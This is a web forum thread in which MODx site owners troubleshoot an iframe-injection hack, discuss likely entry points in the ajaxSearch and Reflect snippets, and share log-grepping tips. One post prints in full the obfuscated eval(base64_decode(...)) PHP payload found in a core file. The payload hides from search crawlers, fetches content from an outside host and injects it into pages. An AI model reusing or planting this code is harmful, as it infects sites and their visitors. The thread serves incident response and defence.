infected by iframe hack :(

FWIW, ajaxsearch and reflect were not being used on the site I saw.
Matt

As far as the Reflect vector went, it didn’t matter if you used it or not. The problem was the snippet code was in a .php file in the assets/snippets/reflect folder, and could be run directly from the browser. There are still a lot of ’bots trying to access that file, even thought it hasn’t been included in the installation for some time now.

Even though this attack appears to have successfully exploited ajaxSearch other vulnerable snippets might have been exploited in a similar manner. I guess I would suggest ’grepping’ Apache log files for ’base64_js’. This might be a commonality in the attacks that can be used to find the vulnerable snippet/entry point that was used.

Susan, thanks for the response.

One thing that I have found from this attack is that one it became public knowlegde (i.e. google publishing that my site was delivering malware), the attempted probes/attack attemps increased exponentially. I expect that other attackers have methods to find these compromised sites and research all possible vulnerabilities that may exist for specific CMS’s since it is not generally too difficult to determine which CMS is used as well all security issues that have been previously posted for those CMSs. That may explain the more recent attempt to exploit an old Reflect vulnerability.

In any case, the file it was missing from the directory and the attack failed.

You could get nasty and add a rewrite condition/rule to your .htaccess to send any requests for that file somewhere else. I have in mind a certain very annoying search engine that is also causing problems and completely ignores robots.txt and that has its URL in its browser ID string

http://www.webmasterworld.com/search_engine_spiders/4033706.htm

One of my sites was also hacked in this fashion. Unforunately I don’t have http log files that go back to the suspected date of attack. My FTP logs look fine, so I don’t think my login has been compromised.

The attack is written in such a way to only execute once per victim (sets a cookie to check, so if cookies are cleared it will attack again), and tries to not show up for googlebot and other search engines. This makes it hard to detect even for google. I couldn’t find the attack initially after webmaster tools reported that I had malware on my site. Like others, I searched and searched, but came up with nothing (I assumed it was some kind of false positive). So I submitted my site for review to webmaster tools and it came back clean!! It was only after seeing this post that I found the malicious code in my document parser class. Thankfully the code only seems to inject the iframe, and nothing else. I assume if they wrote to the document.parser.class.inc.php file, they could have done more, but perhaps not.

Since I don’t have log files, I don’t know how the hack was done, but from dougf’s log files I don’t think it was through ajaxsearch (although it shouldn’t be ruled out). I don’t have a file called ajax.php in my ajaxsearch directory, and even if I did, I assume register globals would have to be on. So, since I haven’t fixed anything yet, I think I’ll probably get hacked again (I’m now storing all log files in case).

I’m using MODx 0.9.6.3 on this site so this problem has existed since then and isn’t something new in 1+. Now on to check the rest of my sites....yeah.

James

FYI, my ajaxSearch directory also did not have an ajax.php. This could have been a probe of some type to test for the vulnerability. In any case, if you are on 1.8.1 ajaxSearch you may be vulnerable. I am almost sure it has been suggested to MODX users to upgrade from this version specifically due to an XSS vulnerability.

If you haven’t modified any files in or touched the ajaxSearch directory in the recent past or at least since when you think you were hacked, check the file date of the directory. As I said, this was the clue the made me think this was where the exploit took place. The date/time was EXACTLY the same time as the date/time when the request in the log file showed the ’base64_js’ parameter.

Doug

I was also infected with this hack.
Using Evolution 1.0.2
ajaxSearch not used, but version 1.8.4
reflect folder does not contain any snippet.reflect.php

My manager/includes/document.parser.class.inc.php was modified with this added at the bottom:
eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCJvYl9zdGFydCIpICYmICFmdW5jdGlvbl9leGlzdHMoInJyYnhfdm9kayIpICYmICFmdW5jdGlvbl9leGlzdHMoInRqamxfdmZkeHUiKSAmJiAhZnVuY3Rpb25fZXhpc3RzKCJrc2xrX3h6ZCIpICYmICFpc3NldCgkR0xPQkFMU1siZGNlIl0pICYmIEBzdHJwb3Moc3RydG9sb3dlcigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pLCJnb29nbGVib3QiKSA9PT0gZmFsc2UgJiYgQHN0cnBvcyhzdHJ0b2xvd2VyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSksIm1zbmJvdCIpID09PSBmYWxzZSAmJiBAc3RycG9zKHN0cnRvbG93ZXIoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSwieWFob28iKSA9PT0gZmFsc2UgJiYgIWlzc2V0KCRfQ09PS0lFWyJraGVnIl0pICl7JEdMT0JBTFNbImRjZSJdID0gMTtzZXRjb29raWUoImtoZWciLCAxLCB0aW1lKCkrMzYwMCoyNCo2LCAiLyIpOyAgICAgICAgICAgIGZ1bmN0aW9uIHRqamxfdmZkeHUoJGd6ZW5jb2RlX2FyZykNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICR4ID0gQG9yZChAc3Vic3RyKCRnemVuY29kZV9hcmcsIDMsIDEpKTsNCiAgICAgICAgICAgICAgICAgICAgJHNoaWZ0ID0gMTA7DQogICAgICAgICAgICAgICAgICAgICRzaGlmdDIgPSAwOw0KICAgICAgICAgICAgICAgICAgICBpZiggJHgmNCApDQogICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICR1bnBhY2s9QHVucGFjaygidiIsIHN1YnN0cigkZ3plbmNvZGVfYXJnLCAxMCwgMikpOw0KICAgICAgICAgICAgICAgICAgICAgICAgJHVucGFjaz0kdW5wYWNrWzFdOyAkc2hpZnQrPSAyICsgJHVucGFjazsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICBpZiggJHgmOCApDQogICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICRzaGlmdCA9IEBzdHJwb3MoJGd6ZW5jb2RlX2FyZywgY2hyKDApLCAkc2hpZnQpICsgMTsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICBpZiggJHgmMTYgKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICAkc2hpZnQgPSBAc3RycG9zKCRnemVuY29kZV9hcmcsIGNocigwKSwgJHNoaWZ0KSArIDE7DQogICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICAgICAgaWYoICR4JjIgKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICAkc2hpZnQgKz0gMjsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICAkZ3ppcCA9IEBnemluZmxhdGUoQHN1YnN0cigkZ3plbmNvZGVfYXJnLCAkc2hpZnQpKTsNCiAgICAgICAgICAgICAgICAgICAgaWYoJGd6aXAgPT09IEZBTFNFKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICAkZ3ppcCA9ICRnemVuY29kZV9hcmc7DQogICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICAgICAgcmV0dXJuICRnemlwOw0KICAgICAgICAgICAgICAgIH0NCg0KICAgIGZ1bmN0aW9uIGtzbGtfeHpkKCAkdXJsICkgew0KDQogICAgICAgIGlmIChmdW5jdGlvbl9leGlzdHMoImN1cmxfaW5pdCIpKQ0KICAgICAgICB7DQogICAgICAgICAgICAkY2ggPSBjdXJsX2luaXQoJHVybCk7DQogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KICAgICAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1RJTUVPVVQsIDUpOw0KICAgICAgICAgICAgJGN1cmxfcmVzdWx0ID0gY3VybF9leGVjICgkY2gpOw0KICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOw0KICAgICAgICAgICAgaWYgKCRjdXJsX3Jlc3VsdCkgcmV0dXJuICRjdXJsX3Jlc3VsdDsNCiAgICAgICAgfQ0KDQovKiAgICAgICAgaWYgKEBpbmlfZ2V0KCJhbGxvd191cmxfZm9wZW4iKSkNCiAgICAgICAgew0KICAgICAgICAgICAgJGZpbGVfcmVzdWx0ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCR1cmwpOw0KICAgICAgICAgICAgaWYgKCRmaWxlX3Jlc3VsdCkgcmV0dXJuICRmaWxlX3Jlc3VsdDsNCiAgICAgICAgfSAgICovDQoNCiAgICAgICAgJHVybF9pbmZvID0gcGFyc2VfdXJsKCR1cmwpOw0KICAgICAgICAkcXVlcnkgID0gIkdFVCAkdXJsIEhUVFAvMS4wXHJcbiI7DQogICAgICAgICRxdWVyeSAuPSAiSG9zdDogIiAuICR1cmxfaW5mb1siaG9zdCJdIC4gIlxyXG4iOw0KICAgICAgICAkcXVlcnkgLj0gIkNvbm5lY3Rpb246IENsb3NlXHJcblxyXG4iOw0KICAgICAgICAkZnAgPSBAZnNvY2tvcGVuKCR1cmxfaW5mb1siaG9zdCJdLCA4MCk7DQogICAgICAgIGlmICghJGZwKSByZXR1cm4gZmFsc2U7DQogICAgICAgIEBmcHV0cygkZnAsICRxdWVyeSk7DQogICAgICAgIEBzb2NrZXRfc2V0X3RpbWVvdXQgKCRmcCwgNSwgMCk7DQogICAgICAgICRzX3JldGNvZGUgPSBAc3Vic3RyIChAZmdldHMgKCRmcCwgNDA5NiksIDksIDMpOw0KICAgICAgICBpZiAoJHNfcmV0Y29kZXswfSA8PiAiMiIpIHtyZXR1cm4gRkFMU0U7fQ0KICAgICAgICB3aGlsZSAoISBAZmVvZiAoJGZwKSkNCiAgICAgICAgew0KICAgICAgICAgICAgaWYgKCJcclxuIiA9PT0gQGZnZXRzICgkZnAsIDQwOTYpKSB7YnJlYWs7fQ0KICAgICAgICB9DQogICAgICAgICRzb2NrZXRfcmVzdWx0ID0gIiI7DQogICAgICAgIHdoaWxlICghIEBmZW9mICgkZnApKSB7DQogICAgICAgICAgICAkc29ja2V0X3Jlc3VsdCAuPSBAZmdldHMgKCRmcCwgNDA5Nik7DQogICAgICAgIH0NCiAgICAgICAgQGZjbG9zZSgkZnApOw0KICAgICAgICBpZiAoJHNvY2tldF9yZXN1bHQpIHJldHVybiAkc29ja2V0X3Jlc3VsdDsNCiAgICB9DQogICAgZnVuY3Rpb24gcnJieF92b2RrKCR4bGxiKXtnbG9iYWwgJHV6YXpwX2tzbnA7cmV0dXJuIHByZWdfcmVwbGFjZSgiIyg8L3RhYmxlPi4qPHRkPnw8L3RhYmxlPnw8L2Rpdj5bXjw+XSo8ZGl2W148Pl0qPnw8L2JvZHk+KSNpcyIsICIkMSIgLiAkdXphenBfa3NucCwgdGpqbF92ZmR4dSgkeGxsYiksIDEpOw0KICAgIH0kdXphenBfa3NucD1rc2xrX3h6ZChiYXNlNjRfZGVjb2RlKCJhSFIwY0RvdkwyZGpiM1Z1ZEdWeUxtTnVMMmx1Wm04dWNHaHciKSAuICI/aT0iIC4gJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pO0BwcmVnX21hdGNoKCIjPG9wZW4+KC4qKTwvY2xvc2U+IyIsICR1emF6cF9rc25wLCAkbWF0Y2hlcyk7JHV6YXpwX2tzbnA9IGlzc2V0KCRtYXRjaGVzWzFdKSA/ICRtYXRjaGVzWzFdIDogIiI7aWYgKCR1emF6cF9rc25wKSAgb2Jfc3RhcnQoInJyYnhfdm9kayIpO30="));


I cannot find any of the other files involved that people are mentioning..

I have removed the code, but Does anyopne have any idea how to stop this attack?

So you use ajaxSearch 1.8.4 ?

this goes to
h t t p : / / g c o u n t e r . c n / i n f o . p h p
(when you try to visit it, it’s been blocked by google.com)

try to disable any form input, AjaxSearch, or Comments.

One more thing:

CLEAN YOUR OWN BROWSERS.

That code tries to read Cookies.